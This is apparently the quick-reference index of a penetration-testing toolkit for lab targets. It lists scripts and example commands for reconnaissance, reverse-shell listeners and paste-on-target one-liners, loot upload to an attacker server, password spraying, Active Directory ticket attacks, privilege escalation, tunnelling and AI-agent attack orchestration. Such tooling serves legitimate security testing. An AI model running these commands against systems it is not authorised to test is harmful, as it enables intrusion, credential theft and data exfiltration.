PentestPilot/TOOLKIT.md

PentestPilot - Quick Reference

For step‑by‑step usage, pipeline semantics, dashboard features, and resume behavior, read HOWTO.md:1. This file focuses on a clickable, categorized command index with succinct usage. Most entries accept TARGET via env if a positional argument is omitted.

Table of Contents

• Setup
• Core Workflow
• Enumeration
• Automation
• Web helpers
• Reverse shells
• File transfer
• Crypto / Text
• Privilege Escalation
• Misc
• AI
• Active Directory
• Passwords
• Windows
• Post-Exploitation
• DNS
• Scanning
• Tunnels
• Pwn
• Hashes
• Tips

Setup

• Keep this repo in a working folder, e.g., htb/.
• Source the shell helpers from your main zshrc: echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc
• Open a new shell or run: source .zshrc.htb

Core Workflow

• settarget <ip_or_host>
  • Creates targets/ with scans, loot, www, exploits.
  • Sets OUTDIR to the target’s scans directory.
• ar → auto_recon: quick scan, optional UDP, basic web enum
• webrecon → run web_recon on detected web ports
• wideweb → wide_web_recon on a list
• notesinit → scaffold notes.md in target directory
• notesattach → append scan artifacts summary to notes

Enumeration (requires TARGET)

• nq → Quick nmap: scripts + versions
• nf → Full TCP: -p- then service/version
• nu → UDP top 200
• smb → SMB enumeration (anon by default)
• snmp → SNMP enumeration (community defaults to public)

Individual scripts (bin/)

• nmap_quick.sh
• nmap_full.sh [--rate 5000]
• nmap_udp.sh [--top 200]
• smb_enum.sh [user] [pass]
• ldap_enum.sh [user] [pass] - auto-detect baseDNs
• nfs_enum.sh
• ftp_enum.sh
• snmp_enum.sh [community]

Automation (bin/automation/) (see HOWTO: Automation & Orchestration, Dashboard, Manifest)

• auto_recon.sh [--no-udp]
• parse_nmap_open_ports.sh <*.gnmap>
• report_summary.py <*.gnmap ...>
• web_recon.sh <target|--url >
• loot_pack.sh [dir]
• wide_web_recon.sh <hosts.txt>
• notes_init.sh
• notes_attach.sh
• full_pipeline.sh <domain|hosts.txt> [--resume|--force]
• manifest.py (init|set|get|addlist|show|task|taskstatus|taskreset) [...]
• dashboard.py [--json]
• resume_all.py - resume full pipeline across all targets
• tech_actions.py [--run] - suggest/run next steps based on httpx techs
• cleanup_scans.sh [dir] [days] [--force] - prune old scan files
• proxy_toggle.sh on|off [http://host:port]
• tmux_init.sh [session] - starter tmux layout

See also in HOWTO.md:

• Automation & Orchestration
• Dashboard (Status & Evidence)
• Manifest (State & Resume)

Examples

# One‑click pipeline (resume‑aware)
full_pipeline.sh target.htb

# Agent‑driven full pipeline with auto tech actions
agent full target.htb

# Dashboard
dashboard --compact

# Resume all incomplete targets
resumeall

Web helpers (bin/web/) (see HOWTO: Web Recon & Routing)

• dirbuster.sh [wordlist] [exts] - ffuf directory fuzz
• vhost_ffuf.sh [wordlist] - virtual hosts
• param_fuzz.sh [wordlist] - parameter discovery
• lfi_tester.py - basic LFI checks
• tech_detect.sh - headers + tech hints
• http_headers.sh - raw headers
• url_titles.py [url2 ...] - titles and codes
• crawl_words.py [depth] - extract words for wordlists
• sqli_quick.sh - sqlmap wrapper
• backup_hunter.sh [paths.txt] - find common backups/configs
• git_dumper.sh [outdir] - mirror exposed .git and restore
• cors_tester.py [origin] - test ACAO/ACAC
• methods.sh - show allowed methods (OPTIONS)
• clone_site.sh [outdir] - wget mirror
• tls_scan.sh host:443 - openssl-based TLS info
• robots_grabber.sh - show Disallow entries
• webdav_detect.sh - OPTIONS + PROPFIND
• httpx_probe.sh <host|file>
• nuclei_quick.sh <url|file> [tags]
• gobuster_dir.sh [wordlist] [exts] [threads]
• httpx_to_nuclei.sh <host|file> [--severity auto|crit|high|med|low] [--tags tags]
• httpx_tech_route.py <host|file> [--tech list] [--dry-run]
• httpx_presets.sh <host|file>
• gobuster_vhost.sh [wordlist] [threads]
• wpscan_quick.sh
• jenkins_quick.sh
• sonarqube_quick.sh
• magento_quick.sh
• droopescan_quick.sh
• joomscan_quick.sh

See also in HOWTO.md:

• Web Recon & Routing

Examples

# Alive → nuclei with auto severity
httpx_to_nuclei.sh hosts.txt

# Route by technology and run extras
httpx_tech_route.py urls.txt --tech wordpress,drupal --wpscan --extra

# Vhost brute and directory brute
gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50

Reverse shells (bin/shells/)

• revsh.py - prints common one-liners
• listener.sh - rlwrap + nc/ncat listener
• tty_upgrade.sh - quick TTY tips

Examples

# Listener
listener.sh 4444

# One‑liners to paste on target
revsh.py YOUR_IP 4444

# Upgrade TTY
tty_upgrade.sh

File transfer (bin/transfer/)

• http_serve.sh [port] - simple Python HTTP server
• serve.py [port] - HTTP server with web upload (POST /upload)
• push_http.sh http://host:port/upload - upload to serve.py
• dl_oneshots.sh - download one-liners
• smb_server.sh [share] [path] - impacket SMB server

Examples

# Simple HTTP
http_serve.sh 8000

# Upload server and push
serve.py 8000
push_http.sh loot.txt http://YOUR_IP:8000/upload

# SMB quick share
smb_server.sh share ./loot

Crypto / Text (bin/crypto/)

• encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot
• jwt_show.py - decode header/payload (no verify)

Examples

encoders.py b64e 'secret'; encoders.py urle 'a b'
jwt_show.py eyJhbGciOi...

Privilege Escalation (bin/privesc/)

• linux_quick_enum.sh - basic local recon
• suid_scan.sh - list SUID/SGID
• caps_scan.sh - list file capabilities

Examples

linux_quick_enum.sh
caps_scan.sh

Misc (bin/misc/)

• cyclic.py create | offset - pattern + offset
• port_forward.sh - wrappers for ssh -L/-R/-D
• extract_urls.py <file...>

Examples

cyclic.py create 4000 | cyclic.py offset Aa0A
port_forward.sh -L 8080:127.0.0.1:80 user@host
extract_urls.py notes.md

AI (bin/ai/) (see HOWTO: AI Integrations)

• ask.py [-m model] [-s system] "prompt" | - (stdin)
• wordlist_from_context.py [context-file|-]
• orchestrate_web.py <hosts.txt>
• review_findings.py <notes.md> [extra]
• commands_planner.py "goal" [context]
• agent_orchestrator.py - multi-agent runner (web|notes|post|ad)

See also in HOWTO.md:

• AI Integrations

Examples

# Plan commands from a goal + context
commands_planner.py "Probe admin portals" urls.txt

# Orchestrate web for a host list
orchestrate_web.py hosts.txt

# Multi‑agent runner
agent web hosts.txt

Active Directory (bin/ad/)

• getnpusers_wrapper.sh <domain/user:pass> <dc_ip> [userlist.txt]
• getspns_wrapper.sh <domain/user:pass> <dc_ip>
• ldap_quick_users.sh [user pass]
• rpc_quick.sh [user pass] - rpcclient lsa/users/groups
• kerbrute_wrapper.sh <users.txt> [dc-ip]
• cme_quick.sh [user pass]

Examples

getnpusers_wrapper.sh domain/user:pass 10.10.10.5 users.txt
getspns_wrapper.sh domain/user:pass 10.10.10.5
rpc_quick.sh $TARGET
kerbrute_wrapper.sh domain users.txt 10.10.10.5
cme_quick.sh $TARGET user pass

Passwords (bin/passwords/)

• mutate_words.py word1 [word2 ...] | -
• spray_http_basic.sh <users.txt>
• merge_dedupe.sh [file2 ...] - dedup merged lists
• wordlist_cleanup.sh [min] [max]
• hash_id.sh - simple guess when hashid missing

Examples

mutate_words.py "acme" "winter"
merge_dedupe.sh list1.txt list2.txt > merged.txt
wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt
spray_http_basic.sh http://$TARGET/protected users.txt Winter2025!

Windows (bin/windows/)

• privesc_quick.ps1 - run on target
• win_share_enum.ps1 -Target
• find_unquoted_services.ps1 - potential service path issues
• find_path_writable.ps1 - writable PATH dirs
• windows_loot.ps1 - targeted loot collector

Examples

powershell -ep bypass -f bin/windows/privesc_quick.ps1
powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET
powershell -ep bypass -f bin/windows/find_unquoted_services.ps1

Post-Exploitation (bin/post/)

• linux_loot.sh - targeted loot collector with size caps
• windows_loot.ps1 - targeted loot collector (PowerShell)
• pack_report.sh - merge loot/scans into markdown report

Examples

LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh
bin/post/pack_report.sh $TARGET

DNS (bin/dns/)

• zone_transfer.sh [ns]
• subenum.sh
• gobuster_dns.sh [wordlist] [threads]

Examples

zone_transfer.sh target.htb
gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100

Scanning (bin/scan/)

• naabu_quick.sh [flags]
• masscan_top.sh [rate]

Examples

naabu_quick.sh $TARGET -p 1-65535
masscan_top.sh $TARGET 20000

Tunnels (bin/tunnel/)

• chisel_server.sh
• chisel_client.sh host:port R:::
• autossh_socks.sh user@host [lport]
• socat_forward.sh -L|-R

Examples

autossh_socks.sh user@pivot 1080
chisel_server.sh 8000 &
chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80

Pwn (bin/pwn/)

• pwntools_template.py - starter exploit template

Examples

python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337

Hashes (bin/hashes/)

• extract_ntlm_from_secretsdump.py [out]
• john_pfx.sh <file.pfx> - john format for PFX

Examples

extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt
john_pfx.sh cert.pfx > pfx.hash

Tips

• OUTDIR controls where scans are saved; set by settarget.
• Most scripts accept TARGET via env if argument omitted.
• If a tool isn’t installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.
• For AI helpers, set OPENAI_API_KEY or run a local Ollama server.
• Use responsibly and only with explicit authorization.
• Dashboard flags: --no-color, --compact, --json
• Read HOWTO.md for detailed guidance and examples.